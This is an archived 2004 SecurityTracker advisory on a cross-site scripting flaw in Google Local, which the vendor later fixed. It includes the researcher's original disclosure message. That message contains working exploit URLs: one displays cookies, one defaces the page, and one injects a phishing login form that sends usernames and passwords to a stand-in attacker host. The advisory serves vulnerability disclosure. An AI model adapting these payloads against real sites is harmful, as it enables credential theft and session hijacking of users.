SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Google Vendors:   Google
Google Local Input Validation Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
SecurityTracker Alert ID:  1012081
SecurityTracker URL:  http://securitytracker.com/id/1012081
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Updated:  Nov 10 2004
Original Entry Date:  Nov 4 2004
Impact:   Disclosure of authentication information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information
Fix Available:  Yes  Vendor Confirmed:  Yes  Exploit Included:  Yes  

Description:   Lostmon reported an input validation vulnerability in Google Local service. A remote user can conduct cross-site scripting attacks.

It is reported that the Google Local service does not properly validate user-supplied input in the 'where' field. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the Google site and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A demonstration exploit URL is provided:

http://[target]/local?hl=3Des&lr=3D&q=3Dxx&near=3D%3Cbody%3E%3Ch1%3EXS=
S%2520poW@%21%21%3Ch1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%=
3E%3C%2Fbody%3E&btnG=3DB%C3%BA

The vendor has been notified.

Impact:   A remote user can access the target user's cookies (including authentication cookies), if any, associated with the Google Local site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.
Solution:   The vendor issued a fix on November 4, 2004.
Vendor URL:  www.google.com/ (Links to External Site)
Cause:   Input validation error

Message History:   None.


 Source Message Contents

Subject:  local.google XSS holes and renote file inclusion and remote comand execution via file remote inclusion


####################################################
Google local XSS vulnerability, remote file inclusion,and remote=20
execution command (via remote file inclusion)
os: win 2000 sp4 Ie 6.x whith all fixes
vendor url:http://www.google.es/lochp http://local.google.com/
original advisore:http://lostmon.spymac.net/blog/
####################################################

Google Local helps you focus your search on a specific geographic
location. Sometimes you want to search the whole worldwide web, and
sometimes you just want to find an auto parts store within walking
distance.

but have a problem and no Stript tags of html codes an attacker write
somo word in the box laveled "what" and can write some code in the box
laveled "were" and  this code was ejecuted an attacker can make a
special url for spoff the web o spoff the seartch results, or spoff
any content what you look.

a demostration xploit=B4s:

hack cookie:

http://www.google.es/local?hl=3Des&lr=3D&q=3Dxx&near=3D%3Cbody%3E%3Ch1%3EXS=
S%2520poW@%21%21%3Ch1%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%=
3E%3C%2Fbody%3E&btnG=3DB%C3%BA

inclusion some content(a image and write in the page):

http://local.google.com/local?hl=3Des&lr=3D&q=3D
lalala&near=3D%3Cbody%3E%3Cp%3E%3Ch1%3EGoogle+
hacked+%21%21%21+lostmon+was+here+%3AD%3C%2Fh1
%3E%3C%2Fp%3E%3Cp%3ENo+les+abandones+%2C+ellos
+no+lo+harian%3C%2Fp%3E%3Cimg+src%3D%22http%3A
%2F%2Fwww.kellypocharaquel.com.ar%2Fimages%2FGata_Misha_con_cria.jpg
%22+alt%3D%22Google+Local%22%3E%3C%2Fbody%3E&btnG=3D
B%C3%BAsqueda

pishing or spofing and inclusion remote file ( data base) for inclusion
password an users:

http://local.google.com/local?hl=3Des&lr=3D&q=3Dcafe&near=3D%3Cbody%3E%3Cfo=
rm+action%3D%22http%3A%2F%2Fwww.atacker.com%2Fsavedb.asp%22+method%3D%22pos=
t%22%3EUsername%3A%3Cinput+name%3D%22username%22+type%3D%22text%22+maxlengt=
h%3D%2230%22%3E%3Cbr%3EPassword%3A%3Cinput+name%3D%22password%22+type%3D%22=
text%22+maxlength%3D%2230%22%3E%3Cbr%3E%3Cinput+name%3D%22login%22+type%3D%=
22submit%22+value%3D%22Login%22%3E%3C%2Fform%3E%3C%2Fbody%3E&btnG=3DB%C3%BA=
squeda

is very Big security hole :////

enjoy and have a nice day :)

Atentamente:

Lostmon (Lostmon@Gmail.com)

Thnx to www.Ayuda-Internet.net for their support
Thnx to Estrella to be my ligth
Ipy :*****

--
La curiosidad es lo que hace mover la mente....
 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC